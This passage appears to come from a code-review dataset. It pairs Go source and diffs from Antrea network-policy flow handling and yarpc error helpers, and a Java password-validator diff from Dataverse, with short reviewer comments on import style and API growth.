NetworkPolicy rule. Each conjunctive match flow entry is // maintained by one specific conjMatchFlowContext which is stored in globalConjMatchFlowCache, and shared by clauses // if they have the same match conditions. clause adds or deletes conjunctive action to conjMatchFlowContext actions. 
// A clause is hit if the packet matches any conjunctive match flow that are grouped by this clause. Conjunction // action flow is hit only if all clauses in the policyRuleConjunction are hit. // 3) Default drop flows are also maintained by conjMatchFlowContext. It is used to drop packets sent from or to the // AppliedToGroup but not pass the Network Policy rule. type policyRuleConjunction struct { id uint32 fromClause *clause toClause *clause serviceClause *clause actionFlows []binding.Flow } // clause groups conjunctive match flows. Matches in a clause represent source addresses(for fromClause), or destination // addresses(for toClause) or service ports(for serviceClause) in a NetworkPolicy rule. When the new address or service // port is added into the clause, it adds a new conjMatchFlowContext into globalConjMatchFlowCache (or finds the // existing one from globalConjMatchFlowCache), and then update the key of the conjunctiveMatch into its own matches. // When address is deleted from the clause, it deletes the conjunctive action from the conjMatchFlowContext, // and then deletes the key of conjunctiveMatch from its own matches. type clause struct { action *conjunctiveAction // matches is a map from the unique string generated from the conjunctiveMatch to conjMatchFlowContext. It is used // to cache conjunctive match conditions in the same clause. matches map[string]*conjMatchFlowContext // ruleTable is where to install conjunctive match flows. ruleTable binding.Table // dropTable is where to install Openflow entries to drop the packet sent to or from the AppliedToGroup but does not // satisfy any conjunctive match conditions. It should be nil, if the clause is used for matching service port. dropTable binding.Table } func (c *clause) addConjunctiveMatchFlow(client *client, match *conjunctiveMatch) *conjMatchFlowContextChange { matcherKey := match.generateGlobalMapKey() _, found := c.matches[matcherKey] if found { klog.V(2).Infof("Conjunctive match flow with matcher %s is already added in rule: %d", matcherKey, c.action.conjID) return nil } var context *conjMatchFlowContext ctxType := modification var dropFlow *flowChange // Get conjMatchFlowContext from globalConjMatchFlowCache. If it doesn't exist, create a new one and add into the cache. context, found = client.globalConjMatchFlowCache[matcherKey] if !found { context = &conjMatchFlowContext{ conjunctiveMatch: match, actions: make(map[uint32]*conjunctiveAction), client: client, } ctxType = insertion // Generate the default drop flow if dropTable is not nil and the default drop flow is not set yet. if c.dropTable != nil && context.dropFlow == nil { dropFlow = &flowChange{ flow: context.client.defaultDropFlow(c.dropTable.GetID(), match.matchKey, match.matchValue), changeType: insertion, } } } // Calculate the change on the conjMatchFlowContext. ctxChanges := &conjMatchFlowContextChange{ context: context, ctxChangeType: ctxType, clause: c, actChange: &actionChange{ changeType: insertion, }, dropFlow: dropFlow, } if c.action.nClause > 1 { // Append the conjunction to conjunctiveFlowContext's actions, and add the changed flow into the conjMatchFlowContextChange. flowChange := context.addAction(c.action) if flowChange != nil { ctxChanges.matchFlow = flowChange ctxChanges.actChange.action = c.action } } else { // Set the flowChange type as "insertion" but do not set flowChange.Flow. In this case, the policyRuleConjunction should // be added into conjunctiveFlowContext's denyAllRules. 
ctxChanges.matchFlow = &flowChange{ changeType: insertion, } } return ctxChanges } func (c *clause) generateAddressConjMatch(addr types.Address, addrType types.AddressType) *conjunctiveMatch { matchKey := addr.GetMatchKey(addrType) matchValue := addr.GetValue() match := &conjunctiveMatch{ tableID: c.ruleTable.GetID(), matchKey: matchKey, matchValue: matchValue, } return match } func getServiceMatchType(protocol *coreV1.Protocol) int { switch *protocol { case coreV1.ProtocolTCP: return MatchTCPDstPort case coreV1.ProtocolUDP: return MatchUDPDstPort case coreV1.ProtocolSCTP: return MatchSCTPDstPort default: return MatchTCPDstPort } } func (c *clause) generateServicePortConjMatch(port *v1.NetworkPolicyPort) *conjunctiveMatch { matchKey := getServiceMatchType(port.Protocol) matchValue := uint16(port.Port.IntVal) match := &conjunctiveMatch{ tableID: c.ruleTable.GetID(), matchKey: matchKey, matchValue: matchValue, } return match } // addAddrFlows translates the specified addresses to conjunctiveMatchFlows, and returns the corresponding changes on the // conjunctiveMatchFlows. func (c *clause) addAddrFlows(client *client, addrType types.AddressType, addresses []types.Address) []*conjMatchFlowContextChange { var conjMatchFlowContextChanges []*conjMatchFlowContextChange // Calculate Openflow changes for the added addresses. for _, addr := range addresses { match := c.generateAddressConjMatch(addr, addrType) ctxChange := c.addConjunctiveMatchFlow(client, match) if ctxChange != nil { conjMatchFlowContextChanges = append(conjMatchFlowContextChanges, ctxChange) } } return conjMatchFlowContextChanges } // addServiceFlows translates the specified NetworkPolicyPorts to conjunctiveMatchFlow, and returns corresponding // conjMatchFlowContextChange. func (c *clause) addServiceFlows(client *client, ports []*v1.NetworkPolicyPort) []*conjMatchFlowContextChange { var conjMatchFlowContextChanges []*conjMatchFlowContextChange for _, port := range ports { match := c.generateServicePortConjMatch(port) ctxChange := c.addConjunctiveMatchFlow(client, match) conjMatchFlowContextChanges = append(conjMatchFlowContextChanges, ctxChange) } return conjMatchFlowContextChanges } // deleteConjunctiveMatchFlow deletes the specific conjunctiveAction from existing flow. func (c *clause) deleteConjunctiveMatchFlow(flowContextKey string) *conjMatchFlowContextChange { context, found := c.matches[flowContextKey] // Match is not located in clause cache. It happens if the conjMatchFlowContext is already deleted from clause local cache. if !found { return nil } ctxChange := &conjMatchFlowContextChange{ context: context, clause: c, ctxChangeType: modification, actChange: &actionChange{ changeType: deletion, }, } conjID := c.action.conjID expectedConjunctiveActions := len(context.actions) expectedDenyAllRules := len(context.denyAllRules) if c.action.nClause > 1 { // Delete the conjunctive action if it is in context actions. action, found := context.actions[conjID] if found { ctxChange.matchFlow = context.deleteAction(conjID) ctxChange.actChange.action = action expectedConjunctiveActions -= 1 } } else { // Delete the DENY-ALL rule if it is in context denyAllRules. ctxChange.matchFlow = &flowChange{ changeType: deletion, } expectedDenyAllRules -= 1 } // Uninstall default drop flow if the deleted conjunctiveAction is the last action or the rule is the last one in // the denyAllRules. 
if expectedConjunctiveActions == 0 && expectedDenyAllRules == 0 {
		if context.dropFlow != nil {
			ctxChange.dropFlow = &flowChange{
				flow:       context.dropFlow,
				changeType: deletion,
			}
		}
		// Remove the context from global cache if the match condition is not used by either DENY-ALL or the conjunctive
		// match flow.
		ctxChange.ctxChangeType = deletion
	}

	return ctxChange
}

// deleteAddrFlows deletes conjunctiveMatchFlow relevant to the specified addresses from local cache,
// and uninstalls Openflow entry.
func (c *clause) deleteAddrFlows(addrType types.AddressType, addresses []types.Address) []*conjMatchFlowContextChange {
	var ctxChanges []*conjMatchFlowContextChange
	for _, addr := range addresses {
		match := c.generateAddressConjMatch(addr, addrType)
		contextKey := match.generateGlobalMapKey()
		ctxChange := c.deleteConjunctiveMatchFlow(contextKey)
		if ctxChange != nil {
			ctxChanges = append(ctxChanges, ctxChange)
		}
	}
	return ctxChanges
}

// deleteAllMatches deletes all conjunctiveMatchFlow in the clause, and removes Openflow entry. deleteAllMatches
// is always invoked when NetworkPolicy rule is deleted.
func (c *clause) deleteAllMatches() []*conjMatchFlowContextChange {
	var ctxChanges []*conjMatchFlowContextChange
	for key := range c.matches {
		ctxChange := c.deleteConjunctiveMatchFlow(key)
		if ctxChange != nil {
			ctxChanges = append(ctxChanges, ctxChange)
		}
	}
	return ctxChanges
}

func (c *policyRuleConjunction) getAddressClause(addrType types.AddressType) *clause {
	switch addrType {
	case types.SrcAddress:
		return c.fromClause
	case types.DstAddress:
		return c.toClause
	default:
		klog.Errorf("no address clause uses AddressType %d", addrType)
		return nil
	}
}

// InstallPolicyRuleFlows installs flows for a new NetworkPolicy rule. Rule should include all fields in the
// NetworkPolicy rule. Each ingress/egress policy rule installs Openflow entries on two tables, one for ruleTable and
// the other for dropTable. If a packet does not pass the ruleTable, it will be dropped by the dropTable.
// NetworkPolicyController will make sure only one goroutine operates on a PolicyRule and addresses in the rule.
// For a normal NetworkPolicy rule, these Openflow entries are installed: 1) 1 conjunction action flow, and 0 or multiple
// conjunction except flows, where the number of except flows is decided by how many addresses are configured in
// rule.ExceptFrom and rule.ExceptTo; 2) multiple conjunctive match flows, the flow number depends on addresses in rule.From
// and rule.To, and service ports in rule.Service; and 3) multiple default drop flows, the number is dependent
// on the addresses in rule.From for an egress rule, and addresses in rule.To for an ingress rule.
// For an ALLOW-ALL rule, the Openflow entries installed on the switch are similar to a normal rule. The differences are:
// 1) rule.Service is nil; and 2) rule.To has only one address "0.0.0.0/0" for an egress rule, and rule.From is "0.0.0.0/0"
// for an ingress rule.
// For a DENY-ALL rule, only the default drop flow is installed for the addresses in rule.From for an egress rule, or
// addresses in rule.To for an ingress rule. No conjunctive match flows or conjunction action except flows are installed.
// A DENY-ALL rule is configured with rule.ID, rule.Direction, and either rule.From (egress rule) or rule.To (ingress rule).
// Other fields in the rule should be nil.
// If there is an error in any clause's addAddrFlows or addServiceFlows, the conjunction action flow will never be hit.
// If the default drop flow is already installed before this error, all packets will be dropped by the default drop flow;
// otherwise all packets will be allowed.
func (c *client) InstallPolicyRuleFlows(ruleID uint32, rule *types.PolicyRule) error {
	c.replayMutex.RLock()
	defer c.replayMutex.RUnlock()

	// Check if the policyRuleConjunction is added into cache or not. If yes, return nil.
	conj := c.getPolicyRuleConjunction(ruleID)
	if conj != nil {
		klog.V(2).Infof("PolicyRuleConjunction %d is already added in cache", ruleID)
		return nil
	}

	conj = &policyRuleConjunction{
		id: ruleID,
	}
	nClause, ruleTable, dropTable := conj.calculateClauses(rule, c)

	// Conjunction action flows are installed only if the number of clauses in the conjunction is > 1. If the number
	// is 1, the rule should be one that drops all packets: no conjunctive match flows or conjunction action flows
	// are installed, but the default drop flow is installed.
	if nClause > 1 {
		// Install action flows.
		var actionFlows = []binding.Flow{
			c.conjunctionActionFlow(ruleID, ruleTable.GetID(), dropTable.GetNext()),
		}
		if rule.ExceptFrom != nil {
			for _, addr := range rule.ExceptFrom {
				flow := c.conjunctionExceptionFlow(ruleID, ruleTable.GetID(), dropTable.GetID(), addr.GetMatchKey(types.SrcAddress), addr.GetValue())
				actionFlows = append(actionFlows, flow)
			}
		}
		if rule.ExceptTo != nil {
			for _, addr := range rule.ExceptTo {
				flow := c.conjunctionExceptionFlow(ruleID, ruleTable.GetID(), dropTable.GetID(), addr.GetMatchKey(types.DstAddress), addr.GetValue())
				actionFlows = append(actionFlows, flow)
			}
		}
		if err := c.flowOperations.AddAll(actionFlows); err != nil {
			return err
		}
		// Add the action flows after the Openflow entries are installed on the OVS bridge successfully.
		conj.actionFlows = actionFlows
	}

	c.conjMatchFlowLock.Lock()
	defer c.conjMatchFlowLock.Unlock()
	// Calculate the conjMatchFlowContext changes. The changed Openflow entries are included in the conjMatchFlowContext change.
	ctxChanges := conj.calculateChangesForRuleCreation(c, rule)
	// Send the changed Openflow entries to the OVS bridge, and then update the conjMatchFlowContext as the expected status.
	if err := c.applyConjunctiveMatchFlows(ctxChanges); err != nil {
		return err
	}

	// Add the policyRuleConjunction into policyCache.
	c.policyCache.Store(ruleID, conj)
	return nil
}

// applyConjunctiveMatchFlows installs OpenFlow entries on the OVS bridge, and then updates the conjMatchFlowContext.
func (c *client) applyConjunctiveMatchFlows(flowChanges []*conjMatchFlowContextChange) error {
	// Send the OpenFlow entries to the OVS bridge.
	if err := c.sendConjunctiveMatchFlows(flowChanges); err != nil {
		return err
	}
	// Update conjunctiveMatchContext.
	for _, ctxChange := range flowChanges {
		ctxChange.updateContextStatus()
	}
	return nil
}

// sendConjunctiveMatchFlows sends all the changed OpenFlow entries to the OVS bridge in a single Bundle.
func (c *client) sendConjunctiveMatchFlows(changes []*conjMatchFlowContextChange) error {
	var addFlows, modifyFlows, deleteFlows []binding.Flow
	var flowChanges []*flowChange
	for _, flowChange := range changes {
		if flowChange.matchFlow != nil {
			flowChanges = append(flowChanges, flowChange.matchFlow)
		}
		if flowChange.dropFlow != nil {
			flowChanges = append(flowChanges, flowChange.dropFlow)
		}
	}
	// Retrieve the OpenFlow entries from the flowChanges.
for _, fc := range flowChanges { switch fc.changeType { case insertion: addFlows = append(addFlows, fc.flow) case modification: modifyFlows = append(modifyFlows, fc.flow) case deletion: deleteFlows = append(deleteFlows, fc.flow) } } return c.bridge.AddFlowsInBundle(addFlows, modifyFlows, deleteFlows) } func (c *policyRuleConjunction) newClause(clauseID uint8, nClause uint8, ruleTable, dropTable binding.Table) *clause { return &clause{ ruleTable: ruleTable, dropTable: dropTable, matches: make(map[string]*conjMatchFlowContext, 0), action: &conjunctiveAction{ conjID: c.id, clauseID: clauseID, nClause: nClause, }, } } // calculateClauses configures the policyRuleConjunction's clauses according to the PolicyRule. The Openflow entries are // not installed on the OVS bridge when calculating the clauses. func (c *policyRuleConjunction) calculateClauses(rule *types.PolicyRule, clnt *client) (uint8, binding.Table, binding.Table) { var ruleTable, dropTable binding.Table var isEgressRule = false switch rule.Direction { case v1.PolicyTypeEgress: ruleTable = clnt.pipeline[egressRuleTable] dropTable = clnt.pipeline[egressDefaultTable] isEgressRule = true default: ruleTable = clnt.pipeline[ingressRuleTable] dropTable = clnt.pipeline[ingressDefaultTable] } var fromID, toID, serviceID, nClause uint8 // Calculate clause IDs and the total number of clauses. if rule.From != nil { nClause += 1 fromID = nClause } if rule.To != nil { nClause += 1 toID = nClause } if rule.Service != nil { nClause += 1 serviceID = nClause } var defaultTable binding.Table if rule.From != nil { if isEgressRule { defaultTable = dropTable } else { defaultTable = nil } c.fromClause = c.newClause(fromID, nClause, ruleTable, defaultTable) } if rule.To != nil { if !isEgressRule { defaultTable = dropTable } else { defaultTable = nil } c.toClause = c.newClause(toID, nClause, ruleTable, defaultTable) } if rule.Service != nil { c.serviceClause = c.newClause(serviceID, nClause, ruleTable, nil) } return nClause, ruleTable, dropTable } // calculateChangesForRuleCreation returns the conjMatchFlowContextChanges of the new policyRuleConjunction. It // will calculate the expected conjMatchFlowContex status, and the changed Openflow entries. func (c *policyRuleConjunction) calculateChangesForRuleCreation(clnt *client, rule *types.PolicyRule) []*conjMatchFlowContextChange { var ctxChanges []*conjMatchFlowContextChange if c.fromClause != nil { ctxChanges = append(ctxChanges, c.fromClause.addAddrFlows(clnt, types.SrcAddress, rule.From)...) } if c.toClause != nil { ctxChanges = append(ctxChanges, c.toClause.addAddrFlows(clnt, types.DstAddress, rule.To)...) } if c.serviceClause != nil { ctxChanges = append(ctxChanges, c.serviceClause.addServiceFlows(clnt, rule.Service)...) } return ctxChanges } // calculateChangesForRuleDeletion returns the conjMatchFlowContextChanges of the deleted policyRuleConjunction. It // will calculate the expected conjMatchFlowContex status, and the changed Openflow entries. func (c *policyRuleConjunction) calculateChangesForRuleDeletion() []*conjMatchFlowContextChange { var ctxChanges []*conjMatchFlowContextChange if c.fromClause != nil { ctxChanges = append(ctxChanges, c.fromClause.deleteAllMatches()...) } if c.toClause != nil { ctxChanges = append(ctxChanges, c.toClause.deleteAllMatches()...) } if c.serviceClause != nil { ctxChanges = append(ctxChanges, c.serviceClause.deleteAllMatches()...) 
} return ctxChanges } func (c *client) getPolicyRuleConjunction(ruleID uint32) *policyRuleConjunction { conj, found := c.policyCache.Load(ruleID) if !found { return nil } return conj.(*policyRuleConjunction) } // UninstallPolicyRuleFlows removes the Openflow entry relevant to the specified NetworkPolicy rule. // UninstallPolicyRuleFlows will do nothing if no Openflow entry for the rule is installed. func (c *client) UninstallPolicyRuleFlows(ruleID uint32) error { c.replayMutex.RLock() defer c.replayMutex.RUnlock() conj := c.getPolicyRuleConjunction(ruleID) if conj == nil { klog.V(2).Infof("policyRuleConjunction with ID %d not found", ruleID) return nil } // Delete action flows from the OVS bridge. if err := c.flowOperations.DeleteAll(conj.actionFlows); err != nil { return err } c.conjMatchFlowLock.Lock() defer c.conjMatchFlowLock.Unlock() // Get the conjMatchFlowContext changes. ctxChanges := conj.calculateChangesForRuleDeletion() // Send the changed OpenFlow entries to the OVS bridge and update the conjMatchFlowContext. if err := c.applyConjunctiveMatchFlows(ctxChanges); err != nil { return err } // Remove policyRuleConjunction from client's policyCache. c.policyCache.Delete(ruleID) return nil } func (c *client) replayPolicyFlows() { var flows []binding.Flow addActionFlows := func(conj *policyRuleConjunction) { for _, flow := range conj.actionFlows { flow.Reset() flows = append(flows, flow) } } c.policyCache.Range(func(key, value interface{}) bool { addActionFlows(value.(*policyRuleConjunction)) return true }) addMatchFlows := func(ctx *conjMatchFlowContext) { if ctx.dropFlow != nil { ctx.dropFlow.Reset() flows = append(flows, ctx.dropFlow) } if ctx.flow != nil { ctx.flow.Reset() flows = append(flows, ctx.flow) } } for _, ctx := range c.globalConjMatchFlowCache { addMatchFlows(ctx) } if err := c.flowOperations.AddAll(flows); err != nil { klog.Errorf("Error when replaying flows: %v", err) } } // AddPolicyRuleAddress adds one or multiple addresses to the specified NetworkPolicy rule. If addrType is srcAddress, the // addresses are added to PolicyRule.From, else to PolicyRule.To. func (c *client) AddPolicyRuleAddress(ruleID uint32, addrType types.AddressType, addresses []types.Address) error { c.replayMutex.RLock() defer c.replayMutex.RUnlock() conj := c.getPolicyRuleConjunction(ruleID) // If policyRuleConjunction doesn't exist in client's policyCache return not found error. It should not happen, since // NetworkPolicyController will guarantee the policyRuleConjunction is created before this method is called. The check // here is for safety. if conj == nil { return newConjunctionNotFound(ruleID) } var clause = conj.getAddressClause(addrType) // Check if the clause is nil or not. The clause is nil if the addrType is an unsupported type. if clause == nil { return fmt.Errorf("no clause is using addrType %d", addrType) } c.conjMatchFlowLock.Lock() defer c.conjMatchFlowLock.Unlock() flowChanges := clause.addAddrFlows(c, addrType, addresses) return c.applyConjunctiveMatchFlows(flowChanges) } // DeletePolicyRuleAddress removes addresses from the specified NetworkPolicy rule. If addrType is srcAddress, the addresses // are removed from PolicyRule.From, else from PolicyRule.To. func (c *client) DeletePolicyRuleAddress(ruleID uint32, addrType types.AddressType, addresses []types.Address) error { c.replayMutex.RLock() defer c.replayMutex.RUnlock() conj := c.getPolicyRuleConjunction(ruleID) // If policyRuleConjunction doesn't exist in client's policyCache return not found error. 
It should not happen, since
	// NetworkPolicyController will guarantee the policyRuleConjunction is created before this method is called. The check
	// here is for safety.
	if conj == nil {
		return newConjunctionNotFound(ruleID)
	}
	var clause = conj.getAddressClause(addrType)
	// Check if the clause is nil or not. The clause is nil if the addrType is an unsupported type.
	if clause == nil {
		return fmt.Errorf("no clause is using addrType %d", addrType)
	}
	c.conjMatchFlowLock.Lock()
	defer c.conjMatchFlowLock.Unlock()
	// Remove the policyRuleConjunction from the actions of the conjunctive matches for the specified addresses.
	changes := clause.deleteAddrFlows(addrType, addresses)
	// Update the Openflow entries on the OVS bridge, and update the local cache.
	return c.applyConjunctiveMatchFlows(changes)
}
1
13,153
Please follow the import style; move it to its similar group
antrea-io-antrea
go
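To illustrate the import-style request above, here is a minimal sketch of the goimports-style grouping the reviewer is asking for. The package paths are hypothetical examples, not the actual imports of the patched file (which are not shown here); the blank imports exist only so the sketch compiles without using every package.

package example

import (
	// Group 1: standard-library packages.
	"fmt"
	"strings"

	// Group 2: third-party modules (illustrative path).
	_ "github.com/sirupsen/logrus"

	// Group 3: packages from the same repository (hypothetical path). A new import belongs in the
	// group of its origin rather than being appended to whichever group happens to be last.
	_ "example.com/project/pkg/types"
)

// Trivial references so the named imports above are used.
var _ = fmt.Sprintf
var _ = strings.TrimSpace

gofmt sorts each blank-line-separated block but does not move imports between blocks, which is why a misplaced import usually has to be flagged in review.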
@@ -63,3 +63,18 @@ func IsUnrecognizedProcedureError(err error) bool { _, ok := err.(errors.UnrecognizedProcedureError) return ok } + +// UnrecognizedEncodingError returns an error for the given request, such that +// IsUnrecognizedEncodingError can distinguish it from other errors coming out +// of router.Choose. +func UnrecognizedEncodingError(req *Request, want []string) error { + return errors.RouterUnrecognizedEncodingError(want, string(req.Encoding)) +} + +// IsUnrecognizedEncodingError returns true for errors returned by +// Router.Choose if the router cannot find a handler for the request's +// encoding. +func IsUnrecognizedEncodingError(err error) bool { + _, ok := err.(errors.UnrecognizedEncodingError) + return ok +}
1
// Copyright (c) 2017 Uber Technologies, Inc. // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. package transport import "go.uber.org/yarpc/internal/errors" // InboundBadRequestError builds an error which indicates that an inbound // cannot process a request because it is a bad request. // // IsBadRequestError returns true for these errors. func InboundBadRequestError(err error) error { return errors.HandlerBadRequestError(err) } // IsBadRequestError returns true if the request could not be processed // because it was invalid. func IsBadRequestError(err error) bool { _, ok := err.(errors.BadRequestError) return ok } // IsUnexpectedError returns true if the server panicked or failed to process // the request with an unhandled error. func IsUnexpectedError(err error) bool { _, ok := err.(errors.UnexpectedError) return ok } // IsTimeoutError return true if the given error is a TimeoutError. func IsTimeoutError(err error) bool { _, ok := err.(errors.TimeoutError) return ok } // UnrecognizedProcedureError returns an error for the given request, // such that IsUnrecognizedProcedureError can distinguish it from other errors // coming out of router.Choose. func UnrecognizedProcedureError(req *Request) error { return errors.RouterUnrecognizedProcedureError(req.Service, req.Procedure) } // IsUnrecognizedProcedureError returns true for errors returned by // Router.Choose if the router cannot find a handler for the request. func IsUnrecognizedProcedureError(err error) bool { _, ok := err.(errors.UnrecognizedProcedureError) return ok }
1
13,933
Do we really need these? This is expanding on an API that we're about to do work on with the error stuff @kriskowal
yarpc-yarpc-go
go
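For context on the API-growth concern above: the helpers being discussed follow a type-assertion classification pattern. A minimal, self-contained sketch of that pattern is below; the type and function names are illustrative stand-ins, not yarpc's internal ones.

package main

import "fmt"

// unrecognizedEncodingError is an illustrative error type standing in for the
// dedicated type a library's internal errors package would define.
type unrecognizedEncodingError struct {
	want []string
	got  string
}

func (e unrecognizedEncodingError) Error() string {
	return fmt.Sprintf("expected one of encodings %v but got %q", e.want, e.got)
}

// isUnrecognizedEncodingError mirrors the IsXxxError helpers in the file above:
// a bare type assertion decides the classification.
func isUnrecognizedEncodingError(err error) bool {
	_, ok := err.(unrecognizedEncodingError)
	return ok
}

func main() {
	var err error = unrecognizedEncodingError{want: []string{"json"}, got: "thrift"}
	fmt.Println(isUnrecognizedEncodingError(err))                         // true
	fmt.Println(isUnrecognizedEncodingError(fmt.Errorf("other failure"))) // false
}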
@@ -146,11 +146,9 @@ public class PasswordValidatorServiceBean implements java.io.Serializable { * @return A List with error messages. Empty when the password is valid. */ public List<String> validate(String password, Date passwordModificationTime, boolean isHumanReadable) { -// public List<String> validate(String password, boolean isHumanReadable) { init(); - final PasswordData passwordData = PasswordData.newInstance(password, String.valueOf(passwordModificationTime.getTime()), null); -// final PasswordData passwordData = PasswordData.newInstance(password, "username", null); + final PasswordData passwordData = new PasswordData(password); final RuleResult result = new RuleResult(); for (PasswordValidator currentUser : validators.values()) {
1
package edu.harvard.iq.dataverse.validation; import edu.harvard.iq.dataverse.util.BundleUtil; import edu.harvard.iq.dataverse.util.SystemConfig; import java.io.File; import java.io.FileNotFoundException; import java.io.FileReader; import java.io.IOException; import java.net.URL; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.Date; import java.util.LinkedHashMap; import java.util.List; import java.util.Properties; import java.util.logging.Level; import java.util.logging.Logger; import java.util.regex.Pattern; import java.util.stream.Collectors; import javax.ejb.EJB; import javax.ejb.Stateless; import javax.inject.Named; import org.passay.CharacterCharacteristicsRule; import org.passay.CharacterRule; import org.passay.DictionaryRule; import org.passay.DictionarySubstringRule; import org.passay.IllegalRegexRule; import org.passay.LengthRule; import org.passay.PasswordData; import org.passay.PasswordValidator; import org.passay.PropertiesMessageResolver; import org.passay.Rule; import org.passay.RuleResult; import org.passay.RuleResultDetail; import org.passay.dictionary.WordListDictionary; import org.passay.dictionary.WordLists; import org.passay.dictionary.sort.ArraysSort; /** * PasswordValidatorServiceBean * <p> * The purpose of this class is to validate passwords according to a set of rules as described in: * https://github.com/IQSS/dataverse/issues/3150 * These contemporary rules govern the way passwords and accounts are protected in order to keep up with current level 3 * sensitivity data standards. * <p> * This class will offer presets: * Rule 1. It will use a dictionary to block the use of commonly used passwords. * <p> * Rule 2. It will include at least one character from at least three out of of these four categories: * Uppercase letter * Lowercase letter * Digit * Special character ( a whitespace is not a character ) * <p> * Rule 3. It will allow either: * a. 8 password length minimum with an annual password expiration * b. 10 password length minimum * <p> * Rule 4. It will forgo all the above three requirements for passwords that have a minimum length of 20. * <p> * All presets can be tweaked by applying new settings via the admin API. * <p> * Two validator types implement the rulesets. * GoodStrengthValidator: applies rule 4 for passwords with a length equal or greater than MIN_LENGTH_BIG_LENGTH * StandardValidator: applies rules 1, 2 and 3 for passwords with a length less than MIN_LENGTH_BIG_LENGTH * <p> * For more information on the library used here, @see http://passay.org * * @author Lucien van Wouw <[email protected]> */ @Named @Stateless public class PasswordValidatorServiceBean implements java.io.Serializable { private static final Logger logger = Logger.getLogger(PasswordValidatorServiceBean.class.getCanonicalName()); //FIXME: hardcoding this dictionary... I think its overwritten but should remove or something. 
private static String DICTIONARY_FILES = "weak_passwords.txt"; private enum ValidatorTypes { GoodStrengthValidator, StandardValidator } @SuppressWarnings("unchecked") private final static LinkedHashMap<ValidatorTypes, PasswordValidator> validators = new LinkedHashMap(2); private int goodStrength; private int maxLength; private int minLength; private int numberOfCharacteristics; private int numberOfConsecutiveDigitsAllowed; List<CharacterRule> characterRules; private String dictionaries = DICTIONARY_FILES; private PropertiesMessageResolver messageResolver; @EJB SystemConfig systemConfig; public PasswordValidatorServiceBean() { final Properties properties = PropertiesMessageResolver.getDefaultProperties(); properties.setProperty(GoodStrengthRule.ERROR_CODE_GOODSTRENGTH, GoodStrengthRule.ERROR_MESSAGE_GOODSTRENGTH); messageResolver = new PropertiesMessageResolver(properties); } public PasswordValidatorServiceBean(List<CharacterRule> characterRules) { final Properties properties = PropertiesMessageResolver.getDefaultProperties(); properties.setProperty(GoodStrengthRule.ERROR_CODE_GOODSTRENGTH, GoodStrengthRule.ERROR_MESSAGE_GOODSTRENGTH); messageResolver = new PropertiesMessageResolver(properties); this.characterRules = characterRules; } /** * validate * * @param password the password to check * @return A List with human readable error messages. Empty when the password is valid. */ public List<String> validate(String password) { return validate(password, new Date()); } /** * validate * <p> * Validates the password properties and determine if their valid. * Password reset consumers would use this method, because there should be no modification date check for new * passwords. * * @param password the password to check * @param passwordModificationTime The time the password was set or changed. * @return A List with human readable error messages. Empty when the password is valid. */ public List<String> validate(String password, Date passwordModificationTime) { return validate(password, passwordModificationTime, true); } /** * validate * <p> * Validates the password properties and its modification date and determine if their valid. * * @param passwordModificationTime The time the password was set or changed. * @param password The password to check * @param isHumanReadable The expression of the error messages. True if the audience is human. * @return A List with error messages. Empty when the password is valid. */ public List<String> validate(String password, Date passwordModificationTime, boolean isHumanReadable) { // public List<String> validate(String password, boolean isHumanReadable) { init(); final PasswordData passwordData = PasswordData.newInstance(password, String.valueOf(passwordModificationTime.getTime()), null); // final PasswordData passwordData = PasswordData.newInstance(password, "username", null); final RuleResult result = new RuleResult(); for (PasswordValidator currentUser : validators.values()) { logger.fine("characterRules.size(): " + characterRules.size()); logger.fine("numberOfCharacteristics: " + numberOfCharacteristics); RuleResult r = currentUser.validate(passwordData); if (r.isValid()) return Collections.emptyList(); result.getDetails().addAll(r.getDetails()); } if (isHumanReadable) { return validators.get(ValidatorTypes.StandardValidator).getMessages(result); } else { return result.getDetails().stream().map(RuleResultDetail::getErrorCode).collect(Collectors.toList()); } } /** * init * <p> * Instantiates and caches the validators. 
*/ private void init() { addStandardValidator(); addGoodStrengthValidator(); } /** * goodStrengthValidator * <p> * Apply Rule 4: It will forgo all the above three requirements for passwords that have a minimum length of * MIN_LENGTH_BIG_LENGTH. */ private void addGoodStrengthValidator() { int goodStrength = getGoodStrength(); if (goodStrength != 0) { PasswordValidator passwordValidator = validators.get(ValidatorTypes.GoodStrengthValidator); if (passwordValidator == null) { final GoodStrengthRule lengthRule = new GoodStrengthRule(); lengthRule.setMinimumLength(goodStrength); final List<Rule> rules = Collections.singletonList(lengthRule); passwordValidator = new PasswordValidator(messageResolver, rules); validators.put(ValidatorTypes.GoodStrengthValidator, passwordValidator); } } } /** * standardValidator * <p> * Apply Rules 1, 2 and 3. */ private void addStandardValidator() { int maxLength = getMaxLength(); int minLength = getMinLength(); int numberOfCharacteristics = getNumberOfCharacteristics(); int numberOfConsecutiveDigitsAllowed = getNumberOfConsecutiveDigitsAllowed(); PasswordValidator passwordValidator = validators.get(ValidatorTypes.StandardValidator); if (passwordValidator == null) { final List<Rule> rules = new ArrayList<>(4); rules.add(dictionarySubstringRule()); final LengthRule lengthRule = new LengthRule(); if (maxLength != 0) { lengthRule.setMaximumLength(maxLength); } if (minLength != 0) { lengthRule.setMinimumLength(minLength); } rules.add(lengthRule); if (numberOfCharacteristics != 0) { rules.add(characterRule(getCharacterRules())); } rules.add(repeatingDigitsRule(numberOfConsecutiveDigitsAllowed)); passwordValidator = new PasswordValidator(messageResolver, rules); validators.put(ValidatorTypes.StandardValidator, passwordValidator); } } /** * dictionaryRule * <p> * Reads in the getDictionaries from a file. * * @return A rule. */ private DictionaryRule dictionaryRule() { DictionaryRule rule = null; try { rule = new DictionaryRule( new WordListDictionary(WordLists.createFromReader( getDictionaries(), false, new ArraysSort()))); } catch 